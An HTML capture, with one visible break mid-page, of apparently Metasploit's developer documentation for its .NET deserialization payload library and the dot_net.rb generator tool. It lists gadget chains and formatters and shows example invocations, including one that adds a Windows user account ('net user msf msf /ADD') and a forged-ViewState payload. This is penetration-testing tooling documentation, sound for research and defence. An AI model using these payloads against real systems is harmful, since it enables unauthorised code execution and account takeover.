<!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=Edge"><link rel="shortcut icon" href="/assets/images/favicon.png" type="image/x-icon"><link rel="stylesheet" href="/assets/css/just-the-docs-default.css"> <script async src="https://www.googletagmanager.com/gtag/js?id=UA-4622520-7"></script> <script> window.dataLayer = window.dataLayer || []; function gtag(){dataLayer.push(arguments);} gtag('js', new Date()); gtag('config', 'UA-4622520-7', { 'anonymize_ip': true }); </script> <script type="text/javascript" src="/assets/js/vendor/lunr.min.js"></script> <script src="https://cdn.jsdelivr.net/npm/mermaid@10.8.0/dist/mermaid.min.js"></script> <script type="text/javascript" src="/assets/js/just-the-docs.js"></script><meta name="viewport" content="width=device-width, initial-scale=1"><title>Dot Net Deserialization | Metasploit Documentation Penetration Testing Software, Pen Testing Security</title><meta name="generator" content="Jekyll v4.3.4" /><meta property="og:title" content="Dot Net Deserialization" /><meta property="og:locale" content="en_US" /><meta name="description" content="View Metasploit Framework Documentation" /><meta property="og:description" content="View Metasploit Framework Documentation" /><link rel="canonical" href="https://rapid7.github.io/metasploit-framework/docs/development/developing-modules/libraries/deserialization/dot-net-deserialization.html" /><meta property="og:url" content="https://rapid7.github.io/metasploit-framework/docs/development/developing-modules/libraries/deserialization/dot-net-deserialization.html" /><meta property="og:site_name" content="Metasploit Documentation Penetration Testing Software, Pen Testing Security" /><meta property="og:type" content="website" /><meta name="twitter:card" content="summary" /><meta property="twitter:title" content="Dot Net Deserialization" /> <script type="application/ld+json"> 
{"@context":"https://schema.org","@type":"WebPage","description":"View Metasploit Framework Documentation","headline":"Dot Net Deserialization","publisher":{"@type":"Organization","logo":{"@type":"ImageObject","url":"https://rapid7.github.io/metasploit-framework/assets/images/favicon.png"}},"url":"https://rapid7.github.io/metasploit-framework/docs/development/developing-modules/libraries/deserialization/dot-net-deserialization.html"}</script><body> <svg xmlns="http://www.w3.org/2000/svg" style="display: none;"> <symbol id="svg-link" viewBox="0 0 24 24"><title>Link</title><svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="feather feather-link"><path d="M10 13a5 5 0 0 0 7.54.54l3-3a5 5 0 0 0-7.07-7.07l-1.72 1.71"></path><path d="M14 11a5 5 0 0 0-7.54-.54l-3 3a5 5 0 0 0 7.07 7.07l1.71-1.71"></path> </svg> </symbol> <symbol id="svg-search" viewBox="0 0 24 24"><title>Search</title><svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="feather feather-search"> <circle cx="11" cy="11" r="8"></circle><line x1="21" y1="21" x2="16.65" y2="16.65"></line> </svg> </symbol> <symbol id="svg-menu" viewBox="0 0 24 24"><title>Menu</title><svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="feather feather-menu"><line x1="3" y1="12" x2="21" y2="12"></line><line x1="3" y1="6" x2="21" y2="6"></line><line x1="3" y1="18" x2="21" y2="18"></line> </svg> </symbol> <symbol id="svg-arrow-right" viewBox="0 0 24 24"><title>Expand</title><svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" 
stroke-linejoin="round" class="feather feather-chevron-right"><polyline points="9 18 15 12 9 6"></polyline> </svg> </symbol> <symbol id="svg-doc" viewBox="0 0 24 24"><ti
<span class="n">formatted</span> <span class="o">=</span> <span class="n">generate_formatted</span><span class="p">(</span><span class="n">stream</span><span class="p">,</span> <span class="n">formatter</span><span class="p">)</span>
</code></pre></div></div><h3 id="example-usage"> <a href="#example-usage" class="anchor-heading" aria-labelledby="example-usage"><svg viewBox="0 0 16 16" aria-hidden="true"><use xlink:href="#svg-link"></use></svg></a> Example Usage</h3><p>The following example uses the <code class="language-plaintext highlighter-rouge">TextFormattingRunProperties</code> gadget chain formatted with the <code class="language-plaintext highlighter-rouge">LosFormatter</code>.</p><div class="language-ruby highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="n">serialized</span> <span class="o">=</span> <span class="o">::</span><span class="no">Msf</span><span class="o">::</span><span class="no">Util</span><span class="o">::</span><span class="no">DotNetDeserialization</span><span class="p">.</span><span class="nf">generate</span><span class="p">(</span>
<span class="n">cmd</span><span class="p">,</span> <span class="c1"># this is the Operating System command to run</span>
<span class="ss">gadget_chain: :TextFormattingRunProperties</span><span class="p">,</span>
<span class="ss">formatter: :LosFormatter</span>
<span class="p">)</span>
</code></pre></div></div><h2 id="command-line-tool"> <a href="#command-line-tool" class="anchor-heading" aria-labelledby="command-line-tool"><svg viewBox="0 0 16 16" aria-hidden="true"><use xlink:href="#svg-link"></use></svg></a> Command Line Tool</h2><p>The library is also available as a standalone command line tool, which is suitable for creating payloads for single-use research purposes. This tool, <code class="language-plaintext highlighter-rouge">dot_net.rb</code>, is available in the <code class="language-plaintext highlighter-rouge">tools/payloads/ysoserial</code> directory. Its arguments are aligned with those of <a href="https://github.com/pwntester/ysoserial.net">YSoSerial.NET</a>, so basic invocations take the same arguments. Note, however, that the <a href="#support-matrix">supported</a> gadgets and formatters are not the same.</p><p>Help output:</p><div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>Usage: ./dot_net.rb [options]
Generate a .NET deserialization payload that will execute an operating system
command using the specified gadget chain and formatter.
Available formatters:
* BinaryFormatter
* LosFormatter
* SoapFormatter
Available gadget chains:
* ClaimsPrincipal
* DataSet
* DataSetTypeSpoof
* ObjectDataProvider
* TextFormattingRunProperties
* TypeConfuseDelegate
* WindowsIdentity
Available HMAC algorithms: SHA1, HMACSHA256, HMACSHA384, HMACSHA512, MD5
Examples:
./dot_net.rb -c "net user msf msf /ADD" -f BinaryFormatter -g TypeConfuseDelegate -o base64
./dot_net.rb -c "calc.exe" -f LosFormatter -g TextFormattingRunProperties \
--viewstate-validation-key deadbeef --viewstate-validation-algorithm SHA1
General options:
-h, --help Show this message
-c, --command &lt;String&gt; The command to run
-f, --formatter &lt;String&gt; The formatter to use (default: BinaryFormatter)
-g, --gadget &lt;String&gt; The gadget chain to use (default: TextFormattingRunProperties)
-o, --output &lt;String&gt; The output format to use (default: raw, see: --list-output-formats)
--list-output-formats List available output formats, for use with --output
ViewState related options:
--viewstate-generator &lt;String&gt;
The ViewState generator string to use
--viewstate-validation-algorithm &lt;String&gt;
The validation algorithm (default: SHA1, see: Available HMAC algorithms)
--viewstate-validation-key &lt;HexString&gt;
The validationKey from the web.config file
</code></pre></div></div><p>The <code class="language-plaintext highlighter-rouge">-g</code> / <code class="language-plaintext highlighter-rouge">--gadget</code> option maps to the <em>gadget_chain</em> argument for the generate functions, while the <code class="language-plaintext highlighter-rouge">-f</code> / <code class="language-plaintext highlighter-rouge">--formatter</code> option maps to the <em>formatter</em> argument.</p><h2 id="making-changes"> <a href="#making-changes" class="anchor-heading" aria-labelledby="making-changes"><svg viewBox="0 0 16 16" aria-hidden="true"><use xlink:href="#svg-link"></use></svg></a> Making Changes</h2><p>Adding new gadget chains and formatters involves creating a new file in the respective library directory: <a href="https://github.com/rapid7/metasploit-framework/tree/master/lib/msf/util/dot_net_deserialization"><code class="language-plaintext highlighter-rouge">lib/msf/util/dot_net_deserialization</code></a>. The “native” gadget chain type is implemented following the <a href="https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-nrbf/75b9fe09-be15-475f-85b8-ae7b7558cfe5">MS-NRBF</a> format and the <a href="https://github.com/dmendel/bindata">Bindata</a> records as defined in the <a href="https://github.com/rapid7/metasploit-framework/tree/master/lib/msf/util/dot_net_deserialization/types"><code class="language-plaintext highlighter-rouge">types/</code></a> subdirectory. 
Once the new gadget chain or formatter is implemented, it needs to be added to the main library file (<a href="https://github.com/rapid7/metasploit-framework/blob/master/lib/msf/util/dot_net_deserialization.rb"><code class="language-plaintext highlighter-rouge">dot_net_deserialization.rb</code></a>).</p><p>Since serialization chain generation is deterministic, a <a href="https://github.com/rapid7/metasploit-framework/blob/master/spec/lib/msf/util/dot_net_deserialization_spec.rb">unit test</a> should be added for any new gadget chain to ensure that the checksum of the BinaryFormatter representation is consistent.</p><h2 id="further-reading"> <a href="#further-reading" class="anchor-heading" aria-labelledby="further-reading"><svg viewBox="0 0 16 16" aria-hidden="true"><use xlink:href="#svg-link"></use></svg></a> Further Reading</h2><p>Since the .NET deserialization gadgets run operating system commands, the following resources can be helpful for module developers to deliver native payloads such as Meterpreter.</p><ul><li><a href="/docs/development/developing-modules/guides/how-to-use-command-stagers.html">How to use command stagers</a><li><a href="/docs/development/developing-modules/libraries/how-to-use-powershell-in-an-exploit.html">How to use Powershell in an exploit</a></ul></div></div><div class="search-overlay"></div></div><script type="text/javascript" src="/assets/js/toggle_mode.js"></script> <script> var config = { theme: 'default', logLevel: 'fatal', securityLevel: 'strict', startOnLoad: true, arrowMarkerAbsolute: false, er: { diagramPadding: 20, layoutDirection: 'TB', minEntityWidth: 100, minEntityHeight: 75, entityPadding: 15, stroke: 'gray', fill: 'honeydew', 
fontSize: 12, useMaxWidth: true, }, flowchart:{ diagramPadding: 8, htmlLabels: true, curve: 'basis', }, sequence: { diagramMarginX: 50, diagramMarginY: 10, actorMargin: 50, width: 150, height: 65, boxMargin: 10, boxTextMargin: 5, noteMargin: 10, messageMargin: 35, messageAlign: 'center', mirrorActors: true, bottomMarginAdj: 1, useMaxWidth: true, rightAngles: false, showSequenceNumbers: false, }, gantt: { titleTopMargin: 25, barHeight: 20, barGap: 4, topPadding: 50, leftPadding: 75, fontSize: 11, gridLineStartPadding: 35, fontFamily: '\'Open Sans\', sans-serif', numberSectionStyles: 4, axisFormat: '%Y-%m-%d', topAxis: false, }, }; mermaid.initia